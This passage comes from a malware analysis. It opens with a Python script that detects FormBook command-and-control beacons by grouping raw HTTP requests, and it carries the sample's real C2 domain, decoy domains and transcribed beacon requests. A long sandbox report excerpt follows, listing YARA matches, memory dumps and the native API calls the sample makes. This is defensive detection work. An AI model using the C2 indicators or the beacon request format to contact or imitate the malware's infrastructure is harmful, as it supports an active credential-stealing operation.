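CONFIG_JSON = json.dumps({
    "C2 list": ["www.platinumcredit.net/sh5d/"],
    "decoy": ["151motors.com", "arsels.info", "electricatrick.com", "jakital.com",
              "suepersoldiers.com", "thefullfledged.com", "vupeliquid.com", "xcgtsret.com"],
})


def req(host: str, yv: str) -> str:
    """Raw request in the exact shape the report shows: no User-Agent, 7-NUL body."""
    return (f"GET /sh5d/?Yv={yv}&8pZ=MFQX HTTP/1.1\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n" + "\x00" * 7)


REQUESTS = [  # six transcribed from the report, one constructed benign request
    req("www.platinumcredit.net", "hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy"),
    req("www.151motors.com", "KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx"),
    req("www.suepersoldiers.com", "SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa"),
    req("www.arsels.info", "U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q"),
    req("www.electricatrick.com", "bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S"),
    req("www.vupeliquid.com", "Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe"),
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
    "Connection: close\r\n\r\n",
]


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.1 request into method, host, path, sorted query keys, headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "host": headers.get("host", "").lower(), "path": url.path,
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            "headers": headers, "body_len": len(body)}


def load_config(cfg_json: str) -> Tuple[Dict[str, str], Set[str]]:
    """C2 entries 'host/path' -> {host: '/path'}; decoys -> lower-cased set."""
    cfg = json.loads(cfg_json)
    c2: Dict[str, str] = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[host.lower()] = "/" + path
    return c2, {d.lower() for d in cfg["decoy"]}


def bare(host: str) -> str:
    """Drop a leading 'www.' so config entries match the Host headers seen on the wire."""
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, c2: Dict[str, str], decoys: Set[str]) -> str:
    h = host.lower()
    if h in c2 or bare(h) in {bare(k) for k in c2}:
        return "c2"
    if bare(h) in decoys:
        return "decoy"
    return "unknown"


def analyse(raw_requests: List[str], cfg_json: str, min_hosts: int = 3) -> List[Dict]:
    """Group requests by (path, query keys); flag C2-path hits and UA-less fan-out."""
    c2, decoys = load_config(cfg_json)
    c2_paths = set(c2.values())
    groups: Dict[Tuple, List[Dict]] = defaultdict(list)
    for p in map(parse_request, raw_requests):
        groups[(p["path"], tuple(p["params"]))].append(p)
    out = []
    for (path, params), reqs in groups.items():
        hosts = sorted({r["host"] for r in reqs})
        no_ua = all("user-agent" not in r["headers"] for r in reqs)
        out.append({"path": path, "params": list(params), "hosts": hosts,
                    "no_user_agent": no_ua,
                    "beacon": path in c2_paths or (len(hosts) >= min_hosts and no_ua),
                    "roles": {h: classify_host(h, c2, decoys) for h in hosts}})
    return out


def beacons(raw_requests: List[str], cfg_json: str) -> List[Dict]:
    return [g for g in analyse(raw_requests, cfg_json) if g["beacon"]]


if __name__ == "__main__":
    for g in beacons(REQUESTS, CONFIG_JSON):
        print(g["path"], g["params"], g["roles"])
```

On the report's traffic this yields one flagged group, /sh5d/ with keys 8pZ and Yv across six hosts, of which www.platinumcredit.net is labelled c2 and the other five decoy; the benign /index.html request is left alone. The fan-out rule is the part that survives a config change: a fresh FormBook build with a different C2 entry still produces the same one-shape-many-hosts pattern from a process that should not be making HTTP requests at all.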

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match; the same seven unpacked PEs and eleven memory dumps listed under AV Detection above.

          System Summary:

Malicious sample detected (through community Yara rule)
Each of the following sources matched both community rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group):
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HkE0tD0g4NXKJfy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 0_2_00C15C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 0_2_013D8250
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 0_2_013DD2F8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 0_2_013DD2E8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00401030
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0041BA02
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00408C7C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0041CC38
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00408C80
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0041C529
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0041BD30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00402D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00402D90
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00E65C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EF900
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FB090
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B20A8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B28EC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1002
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191EBB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019ADBD2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B2B28
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B22AE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B25DD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FD5E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B2D07
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E0D20
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B1D55
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F841F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AD466
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B1FF1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B2EF7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AD616
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01906E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047ED466
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0473841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F1D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04720D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F2D07
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F25DD
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04746E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047ED616
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F2EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F1FF1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047E1002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F28EC
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F20A8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0473B090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0472F900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F22AE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047F2B28
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047EDBD2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0475EBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D02FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D08C80
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D08C7C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D1CC38
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D02D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D02D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: String function: 018EB150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0472B150 appears 35 times
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0041873A NtReadFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_004187BC NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,
